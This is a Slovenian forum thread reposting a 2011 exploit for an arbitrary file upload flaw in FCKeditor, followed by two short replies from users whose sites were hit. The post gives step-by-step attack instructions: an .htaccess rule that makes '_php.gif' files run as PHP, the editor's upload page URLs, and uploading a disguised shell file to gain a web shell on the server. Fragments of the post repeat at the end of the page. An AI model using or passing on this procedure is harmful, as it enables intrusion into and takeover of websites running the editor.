exploit : FCKeditor · Internet Mojster

2954242019484

15. avg 2011 ob 12:51

FCKeditor all versian Arbitrary File Upload Vulnerability

In The Name Of GOD
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] script:http://sourceforge.net/projects/fckeditor/
[+] Author : pentesters.ir

[+] Website : WwW.PenTesters.IR

1.create a htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2.Now upload this htaccess with FCKeditor.
http://target.com/FCKeditor/editor/filemanager/upload/test.html

http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name "shell.php.gif" change to "shellphp.gif" automatically.
5.http://target.com/anything/shellphp.gif

6.Now shell is available from server.

1131 42

spletne strani php .htaccess

Mika

4116298477356

15. avg 2011 ob 21:11

Dobro poznano, le da sem bil jaz žrtev :)

1

1qay1qay

2954242019484

16. avg 2011 ob 09:15

tudi moj prijatelj :(, ni imel admin mape zaklenjene in ije fasal eval po celi strani

exploit : FCKeditor

2 naročnika

[+] Website : WwW.PenTesters.IR

http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

6.Now shell is available from server.

2 odgovora

exploit : FCKeditor 2 naročnika

[+] Website : WwW.PenTesters.IR

http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html

6.Now shell is available from server.

2 odgovora

exploit : FCKeditor

2 naročnika